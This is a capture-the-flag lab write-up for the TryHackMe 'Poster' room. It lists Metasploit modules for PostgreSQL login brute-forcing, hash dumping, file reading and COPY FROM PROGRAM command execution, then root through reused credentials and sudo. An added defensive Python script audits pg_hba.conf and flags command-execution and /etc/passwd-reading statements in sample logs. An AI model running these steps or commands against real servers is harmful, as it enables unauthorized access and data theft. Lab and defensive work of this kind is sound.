TryHackMe | Poster Writeup

This room focuses on PostgreSQL and on how a misconfiguration can lead to Remote Code Execution.

NMAP SCAN

Always do recon; recon is the way to win. Take note of versions.

Findings

Web (Port 80)

  1. Apache 2.4.18
  2. No robots.txt

Not much was found, but always run a directory scanner in case there are hidden files on the web server.

DB (Port 5432)

  1. We can pentest this port remotely with the psql client:
    psql -h <host> -U <username> -d <database> # Remote connection
  2. We can enumerate user credentials using Metasploit:
    auxiliary/scanner/postgres/postgres_login

    Found valid credentials:
    [+] 10.10.94.103:5432 - Login Successful: postgres:password@template1
  3. We can use another module to execute SQL commands:
    auxiliary/admin/postgres/postgres_sql
    PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
  4. Now we can try dumping password hashes using another module:
    auxiliary/scanner/postgres/postgres_hashdump
  5. We can also read files from the server using a module:
    auxiliary/admin/postgres/postgres_readfile
  6. We can also run another module for OS command execution through COPY FROM PROGRAM:
    exploit/multi/postgres/postgres_copy_from_program_cmd_exec

We now have a shell.
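The shell above comes from two weaknesses chained together: a superuser account reachable over the network with a guessable password, and that superuser being allowed to run COPY ... FROM PROGRAM. Both are things a DBA can check for. The following is an added example, not part of the original writeup and not code from the Metasploit modules listed above. It audits pg_hba.conf rules for network exposure and weak authentication methods, and scans PostgreSQL server log lines for COPY FROM PROGRAM and pg_read_file calls (this assumes log_statement is set so statements reach the log). The pg_hba.conf rules and log lines are constructed samples, not captured from the room's target.

```python
"""Defensive checks for the two PostgreSQL weaknesses this room turns into a shell.

Added example, not part of the original writeup. The pg_hba.conf rules and the
log lines below are constructed samples.
"""
import re
from dataclasses import dataclass


# --- 1. pg_hba.conf: who may connect from where, and how they authenticate -----

@dataclass
class HbaFinding:
    line_no: int
    rule: str
    reason: str


# Address forms in pg_hba.conf that mean "any host on the network".
_ANY_ADDR = {"0.0.0.0/0", "::/0", "all"}


def audit_hba(conf_text: str) -> list[HbaFinding]:
    """Flag pg_hba.conf rules that let clients reach the server with weak or no
    authentication. Returns one finding per risky rule (a rule may yield several)."""
    findings = []
    for no, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        if fields[0] == "local":
            # Unix-socket rules: TYPE DATABASE USER METHOD (no address column).
            if len(fields) >= 4 and fields[3] == "trust":
                findings.append(HbaFinding(no, line, "local connections need no password (trust)"))
            continue
        if len(fields) < 5:
            continue  # malformed host rule; nothing to judge
        _, _db, user, addr, method = fields[:5]
        if method == "trust":
            findings.append(HbaFinding(no, line, "remote connections need no password (trust)"))
        if addr in _ANY_ADDR and user in ("all", "postgres"):
            findings.append(HbaFinding(no, line, f"superuser/all roles reachable from any address via {method}"))
        if method == "password":
            findings.append(HbaFinding(no, line, "cleartext password method"))
    return findings


# Weak configuration: the superuser is reachable from anywhere, and IPv6 needs no password.
SAMPLE_HBA = """\
# TYPE  DATABASE        USER            ADDRESS                 METHOD
local   all             postgres                                peer
host    all             all             127.0.0.1/32            md5
host    all             all             0.0.0.0/0               md5
host    all             all             ::/0                    trust
"""

# Corrected configuration: superuser only via local socket, app role only from its subnet.
HARDENED_HBA = """\
local   all             postgres                                peer
host    all             all             127.0.0.1/32            scram-sha-256
host    shop            app             10.10.0.0/16            scram-sha-256
"""


# --- 2. Server log: statements that run OS commands or read server files ---------

_RCE_RE = re.compile(r"\bCOPY\b.*?\bFROM\s+PROGRAM\b", re.IGNORECASE)
_FILE_RE = re.compile(r"\bpg_read_(?:binary_)?file\s*\(", re.IGNORECASE)


def find_suspicious_statements(log_lines):
    """Return (line_no, tag, line) for log lines showing OS command execution via
    COPY FROM PROGRAM or server-side file reads via pg_read_file()."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        if _RCE_RE.search(line):
            hits.append((no, "copy_from_program", line.strip()))
        elif _FILE_RE.search(line):
            hits.append((no, "pg_read_file", line.strip()))
    return hits


# Constructed log lines in the default stderr format with log_statement=all.
SAMPLE_LOG = """\
2024-01-01 10:00:01 UTC [2101] postgres@template1 LOG:  connection authorized: user=postgres database=template1
2024-01-01 10:00:02 UTC [2101] postgres@template1 LOG:  statement: SELECT version();
2024-01-01 10:00:03 UTC [2101] postgres@template1 LOG:  statement: COPY cmd_output FROM PROGRAM 'id';
2024-01-01 10:00:05 UTC [2101] postgres@template1 LOG:  statement: SELECT pg_read_file('/etc/passwd');
2024-01-01 10:00:07 UTC [2102] app@shop LOG:  statement: COPY orders FROM '/tmp/orders.csv' CSV;
""".splitlines()


if __name__ == "__main__":
    for f in audit_hba(SAMPLE_HBA):
        print(f"pg_hba.conf line {f.line_no}: {f.reason}: {f.rule}")
    for no, tag, line in find_suspicious_statements(SAMPLE_LOG):
        print(f"log line {no} [{tag}]: {line}")
```

The last sample log line is an ordinary COPY from a file and is deliberately not flagged; only FROM PROGRAM executes a shell command. COPY ... FROM PROGRAM is restricted to superusers (and, on PostgreSQL 11 and later, members of pg_execute_server_program), so the fix on the room's target is the same as in the hardened rules: keep the postgres superuser off the network, give applications their own non-superuser role, and replace the default password.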

Privilege Escalation

  1. Found credentials in config.php.
  2. User Dark cannot run sudo.
  3. The DB password is reused for user alison, so we can switch to user alison.
  4. Check sudo -l:
    User alison may run the following commands on ubuntu: (ALL : ALL) ALL
  5. Simply run sudo /bin/bash for easy root.

Student that loves FOSS